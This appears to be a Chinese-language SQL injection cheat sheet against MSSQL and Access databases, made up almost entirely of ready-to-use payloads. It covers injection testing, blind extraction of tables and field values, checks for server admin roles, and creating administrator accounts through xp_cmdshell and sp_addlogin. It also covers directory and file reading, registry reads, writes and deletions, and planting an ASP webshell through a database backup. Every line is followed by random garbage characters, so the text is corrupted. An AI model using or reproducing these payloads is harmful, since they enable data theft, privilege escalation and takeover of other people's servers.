1.判断是否有注入;and 1=1 ;and 1=2 ?W{�+[OXs
2.初步判断是否是mssql ;and user>0 �v�I�I{�i�
�@k&6\�1/U
3.注入参数是字符'and [查询条件] and ''=' a�WIkp5BFj
["<X�h0�_
4.搜索时没过滤参数的'and [查询条件] and '%25'=' T�j#S')�s8
8Y.q�P"�s
5.判断数据库系统 ?E"192�,z@
n2bhCd]j<b
;and (select count(*) from sysobjects)>0 mssql 7h}gIm7�e"
SK\@w9#&�$
;and (select count(*) from msysobjects)>0 access �XnZ$��%?$
q4[}�b-fF�
� |${4�sUR
P!W%KobZ7|
6.猜数据库 ;and (select Count(*) from [数据库名])>0 1`K-f
m)��
i90�X0b-A�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 'z;�(Y*jb�
YWK0.F,8�a
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 qU���!��dg
^A@f{g$KB+
9.(1)猜字段的ascii值(access) %�xlp�O�R4
]
#@:V�R
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 *'�-4%7C`1
<=">2W�P{
(2)猜字段的ascii值(mssql) �EwzR4,r\M
KVa{;zBwl�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 E2'Wzrovlo
-U�/)y:k!%
10.测试权限结构(mssql) PaI\y�!�f�
TRGpE��9i�
'#f�<wf��n
Iw`tb�N
L[
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- .D
4G;=Q
x"�Ky_P~��
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- <�R�]��m(�
{s
mk<��NL
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �oj�y^���A
i w�gt\ux.
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- >J7slDRo�
FM�VAXOO��
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- l�V$JCN��e
=HCEUB9Fs�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �B-M�S@�<2
,�a{85HLr]
;and 1=(select IS_MEMBER('db_owner'));-- .t_�t�)'�L
�5�G�`HJ6�
7\6g>4J^�`
[���A7TS�N
11.添加mssql和系统的帐户 T)\}V#i�A*
ipwlP|UjQ5
;exec master.dbo.sp_addlogin username;-- F0�<�)8�{s
;exec master.dbo.sp_password null,username,password;-- ?}K�RAtJ8�
=wh[D$�n$~
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- e�_=K0�fFz
eM<N?�9�s�
;exec master.dbo.xp_cmdshell 'net user username password kkq1:\pZ]a
ab2���F�K�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �=\O#F88ui
��G��Oc�
�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �#�%"�G[�B
��Zk=,`sBC
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- iwK.*�0�7+
�duG��3-E�
��(bb!VVA
�y!=��,u��
12.(1)遍历目录 7[�1L��h'u
lp
*GJP]T
;create table dirs(paths varchar(100), id int) �|8k1Bap`z
Kv|
x
-_7�
;insert dirs exec master.dbo.xp_dirtree 'c:\' 0SI@`C*1o�
�q�6�>�eb�
;and (select top 1 paths from dirs)>0 �L��
BbST!
hT��tn
/j
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) JY"jj}H]|�
#d@wj�Q0DW
<�,M"�k�F:
M`�cxxDj&j
(2)遍历目录 �g�$K\�rA�
?@�rd,:'dE
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- i(j��/���C
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �9^}&��PEl
v�$]B;;[A�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 f7x2"&?v�g
�c�U6*y!}9
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 B]�X8Kz�Lu
pa�!BJ]~��
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 %+~\I\�)�1
E�8!`d�}\#
�v�)+g�<!�
_9h$�8(wjn
13.mssql中的存储过程 [J�,��.?'V
�(�DiduS�J
xp_regenumvalues 注册表根键, 子键 ?@'&�<o0p#
Pu3oQD�ldV
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 [�~9UsHf�H
)pHtsd.�eP
xp_regread 根键,子键,键值名 >�jI�.$%L$
�|n�26[=\B
;exec xp_regread �Wl�c&QOfF
g+#a�w�i7�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 cX�b*d|-|N
o�!tC�{"�g
xp_regwrite 根键,子键, 值名, 值类型, 值 w)E�Y�j+L
�+u$l]~St\
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 fu�5L)P^T�
q/ljH�_-��
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 -ZaeX]^&Q\
b}��K,wAx
xp_regdeletevalue 根键,子键,值名 p�l]|yI��Z
h�P"2X"kz&
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 {:1j>4m��2
BP3Ha8/X��
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 1wR[n�Bg*|
d���b�by.%
�� ��QHNyH
?���Lg(,-:
14.mssql的backup创建webshell KwL_ae6�fV
�d�/�; tq�
use model "`%� ,�l|D
[M\ an6h6O
create table cmd(str image); 3x[C�p�g,
�G�L
n� M1
insert into cmd(str) values (''); ;u<Ah?w�=Z
PJ5}c!�o[�
backup database model to disk='c:\l.asp'; �3]*�Kz*�i
�^FL�s_=�E
tl��0|�.Q,
hE&��6;3">
15.mssql内置函数 d>�p�' �A_
���`�s7�pM
;and (select @@version)>0 获得Windows的版本号 r�07u�6�OA
DB|1�Sqjsn
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ^^b�'tP1>
7�a"�06Et^
;and (select user_name())>0 爆当前系统的连接用户 PeJ#9hI~rQ
�mUg :<�.^
;and (select db_name())>0 得到当前连接的数据库 ���^%���7(
]�rv\s�D`[
w�K�(�]E%\
�
V9)�� /�
16.简洁的webshell gc���A:Q4
^-"��I�w�y
use model TE�
Z%|5(]
w�KM9��f�s
create table cmd(str image); =|?�`5��!A
P7��3GH���
insert into cmd(str) values (''); qX@e+&4P�0
�99=~vNn��
backup database model to disk='g:\wwwtest\l.asp';
